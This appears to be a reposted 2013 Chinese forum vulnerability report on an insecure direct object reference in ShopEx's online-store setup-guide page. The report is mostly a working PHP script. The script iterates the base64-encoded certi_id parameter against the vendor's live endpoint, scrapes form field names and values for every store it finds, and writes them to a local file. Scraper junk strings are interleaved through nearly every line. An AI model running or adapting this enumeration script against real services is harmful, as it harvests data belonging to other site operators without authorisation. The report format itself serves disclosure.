|
|
简要描述: T0 d! b0 Y+ o4 m" J
ShopEx某接口缺陷,可遍历所有网站+ ?7 _) A7 Q4 L) g! T9 ?; b
详细说明:
3 V" h/ p( N1 }" J+ S问题出现在shopex 网店使用向导页面
8 C. W+ _8 V1 ]# ]$ Y* [
L1 |) ? b4 u% n/ j# [0 m# A( Y# \$ j
2 r, J. f5 Q: V
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
& Y: k" i" v' p$ k( g* p; B; I: E: M* f* w# Z& h3 l/ w
/ F8 P% v5 X2 t( J/ p
" x3 o% W9 s- Grefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}* A1 [* u9 U+ y( F3 y7 }5 u: i
9 ?$ t$ L/ M- e
0 s' b6 z8 W- F/ j3 L/ G' Y3 c* f4 @7 s& [2 l6 L A
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
. ]( B- v& q' y& y0 E) u. Y$ n) b% V4 ?& `3 v
, T5 }2 {4 \, B8 y
a" J" V% g4 M* @' T( p" p
<?php
* ]- D) ?% O2 L# M4 Y$ \1 J! h2 f& Z* F0 j+ N' v; A' }, J
for ($i=1; $i < 10000; $i++) { //遍历
& T4 K; h( R% ?, o' S, H7 G2 }1 f$ ^4 o# r
ShowshopExD($i);
$ q% p2 `# V3 r1 C$ b) I% ^- d% B. T& {, D# N" r2 h
}& d+ e& I9 ?8 }* B! O: i# i$ |% n
5 a4 q& ^! x5 V9 y$ v) l5 m$ g
function ShowshopExD($cid) {% g: e) [, P. ^4 K6 `
8 {( A" M4 U; f! p) B) W* w, A9 b $url='http://guide.ecos.shopex.cn/step2.php'; s. X2 H) T2 J) ?+ v+ j5 `8 Z5 F
5 }) Q! u) j! ]6 G+ D
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
- g& R+ F% U/ D' z8 E! }& Z$ ^2 _" M4 w8 |4 K s
$url = $url.'?refer='.$refer;
3 K |6 S' g; f$ {0 l) k8 ?7 L% o- u9 N
$ch = curl_init($url);
" X& m& T9 m. E3 E, R' n) a! w
4 P& g l' g, W! i curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;2 B3 s5 ~8 X# R9 Q! F
( q# u! R7 S+ m# c, C8 _3 R9 L
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
1 K) I3 f' Q3 R; J, y% R7 C& \2 {" K" h$ {: y% l& m: J
$result = curl_exec($ch);
/ u, w2 J, {' N4 v/ F! H$ t. v ]6 U) V3 a
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
# V$ h/ J0 R! |7 k& k- y: p! j0 s5 ]5 Y
0 h# D: g3 u" m% ?% x if(strpos($result,$refer))
8 z6 b# @: ? O2 {$ I
; _" \* \; Q& X1 O; i8 N3 J {
1 g! F5 @9 `: E8 ^+ |$ H' ?2 I) \( v
; L: a& T0 z- L, P8 n9 N $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
& v3 _, `' A c u5 G t; p/ n* x9 P5 \; t, Z( |
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
( v I d! y8 W' p
( j1 m/ ^/ C0 U& O' ^% h foreach ($value[1] as $key) {
* }5 \$ x p+ q. r' Y, h
) B% e1 J% c! i7 U preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);9 D2 O" } @" x; Y) }% A
& d% W8 Z. a, z/ v
echo $res[1][0].':'.$res[3][0]."\r\n";, S' ~4 O! D5 {5 h( N- |
' T8 {) O. G# ?/ G5 T
$col =$res[1][0].':'.$res[3][0]."\r\n"; 5 r& p; t! ^, J4 e0 t
- x( r! P9 J' B5 D! O( [
fwrite($fp, $col, strlen($col));
5 E; A8 b- D4 x! z& r. p* o4 g8 Y4 f
}3 A- m$ B! K t. W5 r- c
n( ~: g2 g# A% @: O5 J
echo '--------------------------------'."\r\n";- x/ l, a4 G$ W$ m
2 \' ?( V, o0 c6 m9 I& m
fclose($fp);
/ y0 h5 t1 w/ d/ X4 c
- T" Y G& H; U, e9 d1 J }4 P% m% N$ c% l
# Z. }, {& v1 x* S( m0 q2 ^! s
flush();
) p; y# C9 S5 G2 m P) t8 g# ~7 O
curl_close($ch);$ x# H% D& ~7 D: |$ F
: a& G& a% g/ _; [! }1 u
}
6 p" \1 v* U2 C! Y3 G
- i3 F; J8 W- Q7 q P* F: C2 X?>4 J" G' |4 b' Y3 @$ A. [
漏洞证明:
. E+ Z9 N9 @/ ]' k; nhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
$ V$ q- F( l7 t. t% S- T. Lrefer换成其他加密方式
* P# `4 ]( c" o; O6 h& z5 v. b' G |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对